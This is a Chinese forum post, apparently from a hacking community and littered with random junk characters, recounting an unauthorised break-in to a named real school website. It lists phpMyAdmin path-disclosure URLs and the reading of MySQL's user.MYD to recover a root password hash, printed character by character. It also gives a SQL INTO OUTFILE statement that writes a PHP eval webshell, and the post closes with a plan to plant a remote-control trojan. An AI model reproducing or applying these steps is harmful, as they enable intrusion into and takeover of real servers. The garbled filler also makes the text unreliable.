3、magic_quotes_gpc()=OFF
& C5 N3 J5 h3 d6 V+ W2 U S
% v) l; O \1 e& F0 O0 @7 u' G
试着爆绝对路径:
2 {) B* `6 i6 i2 f# r1./phpMyAdmin/index.php?lang[]=1
* \* r- h6 A4 H& R4 G# Q ]2./phpMyAdmin/phpinfo.php
" o% E8 z0 L* K
3./load_file()
: V1 ^7 }0 b4 T( j& I4./phpmyadmin/themes/darkblue_orange/layout.inc.php
. d1 u3 ^8 ~+ G, q \
5./phpmyadmin/libraries/select_lang.lib.php
. f( ^, u \1 B, u0 y; p
6./phpmyadmin/libraries/lect_lang.lib.php
, d# [9 \4 y+ j- }6 D* v
7./phpmyadmin/libraries/mcrypt.lib.php
/ B6 r3 }1 R! h9 I* E0 J8./phpmyadmin/libraries/export/xls.php
# B9 G' I# a, T0 w" A- d
8 a8 w2 o- c, |, |8 Y- a! D均不行...........................
9 Y0 D3 D# t( x7 G* v
1 _5 B( W- V+ H, B5 ^7 O$ V. S7 P
御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
, c+ F, a3 V% w$ c/ [
% b9 I/ b. `4 X! y3 D. ]( c
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
^5 b* V( r/ z& L" l. K
, w# _8 ? Y0 }/ n. ?5 h) X! d- |默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
: u C% h! s' b& y0 z& C4 ?. \
( {) P8 f7 @. }9 b, j& Z3 s敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
% k6 p! T6 k0 D
0 ~6 D, b5 N8 ]0 _* f; n想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
/ A$ S$ k3 A: q$ n. G
4 \6 ]- j8 o8 |. T2 i; G' D. Bhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
9 u+ n: L4 b5 |" B; K0 U8 K; i2 |" @
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
/ a; b& A( _/ E$ @ c7 |9 l
0 D8 A, [8 s9 r3 R( O成功读到root密码:
7 y- [' h+ A, C1 p, K- s
) o6 I; i- H9 u9 N$ {$ Y7 a! F9 N
17---- r(0072)
$ j F& S2 n; z; X- ~
18---- o(006f)
' P; U) U8 W: d1 T$ N
19---- o(006f)
. Z# c' K, E7 j/ e+ A5 M20---- t(0074)
+ S0 r s" l* o
21---- *(002a)
1 j! o& T) d. O' w( g7 W5 n2 v# Z
22---- 8(0038)
8 G* u2 Y: z" G
23---- 2(0032)
) E0 u7 _- P+ G( m9 @# Z$ }
24---- E(0045)
% Q* o2 n1 z0 W2 @25---- 1(0031)
; C I D0 [! Y/ ]/ u
26---- C(0043)
1 F v4 x9 T1 T6 u5 ?* Q4 V. M" y+ [- `
27---- 5(0035)
3 I4 ~& V: L$ T# F! O/ [4 U
28---- 8(0038)
0 ~8 T6 k$ E4 _7 ?/ j2 {29---- 2(0032)
6 p6 @1 P! }! K7 `30---- 8(0038)
3 B7 _/ e0 T& f% b, e$ i! Y31---- A(0041)
3 W9 X4 `. X: h0 |( k+ v c
32---- 9(0039)
- e7 E8 y7 o9 z" U; ~" B, u K, ~/ m33---- B(0042)
9 S* }" C- N) Q/ S
34---- 5(0035)
9 c3 }( p7 ~+ e. R* v7 {6 U5 I. V/ N
35---- 4(0034)
1 b: K1 c k) a/ |7 \7 v4 r
36---- 8(0038)
/ R9 e9 \% v7 ?0 Y8 A! _4 o37---- 6(0036)
0 g- G+ F7 k. i9 x38---- 4(0034)
% A2 u% {6 ^2 x' E' E/ M8 E. d$ P39---- 9(0039)
+ z0 M; `. k' S: m: @* c
40---- 1(0031)
8 b$ K! j2 B: h" R( t) f, f1 U
41---- 1(0031)
: C& j; I' e: ^/ ]. F5 U
42---- 5(0035)
. a ?( j8 n1 X1 j5 t! k43---- 3(0033)
- w8 Q; M$ q/ }44---- 5(0035)
3 r0 ] c* R' e. q8 I
45---- 9(0039)
% u8 _6 y/ Y( n1 L6 ~7 [& \ w1 G46---- 8(0038)
3 C( `" i) ?( J- d% k8 r! C3 z& f47---- F(0046)
$ w4 q1 `) V* |( |
48---- F(0046)
/ c5 P& H) }5 P49---- 4(0034)
1 \+ }, x# p9 L1 ^. |( i8 z
50---- F(0046)
. D* V$ ^5 {2 Q# x* _( ?' q- g, q
51---- 0(0030)
: u' e/ K! ?5 | v52---- 3(0033)
7 w% y7 D5 M. `8 }9 u) I53---- 2(0032)
7 l, e" h: k8 C54---- A(0041)
4 V9 |; n: ?! c+ u" b
55---- 4(0034)
" F2 T( q$ U0 Q+ T$ t7 ]2 c+ w56---- A(0041)
$ o$ L2 r/ Z9 f: }3 g0 c/ l+ s7 o57---- B(0042)
0 S0 _1 ^1 S4 n0 M
58---- *(0044)
2 P. K6 F, D7 t8 A; K59---- *(0035)
# F. R/ [' ?% f* F1 O
60---- *(0041)
0 D- \6 c$ S& {1 a/ r0 t
61---- *0032)
" o! y- j2 P: R3 M5 j" {
% d( m% [ p, }& t s9 N4 H1 g解密后成功登陆phpmyamin
' `! R. {# F, F, W8 o; @+ L* T
+ z3 `/ @5 c# i1 m" j+ J
% H- O( y2 s$ K9 x3 x e, f
[attach]164[/attach]
6 ~, ]3 ~' k# I. F/ J! ~6 f5 T
* \& ^1 T) _( f; w0 e
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
6 B2 j6 K/ n8 }$ g) R4 b( C& r
7 l5 \! ^ z% ~% [成功执行,拿下shell,菜刀连接:
7 r5 p% a0 C& `8 s9 \
2 V( D: ~+ c7 L7 l服务器不支持asp,aspx,php提权无果...................
0 r% P5 e3 {7 Q3 g9 [$ A8 r; C
: Z6 U, j$ W" A b# \1 e+ V M但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
# n$ L9 v+ Z l- r7 i5 C8 m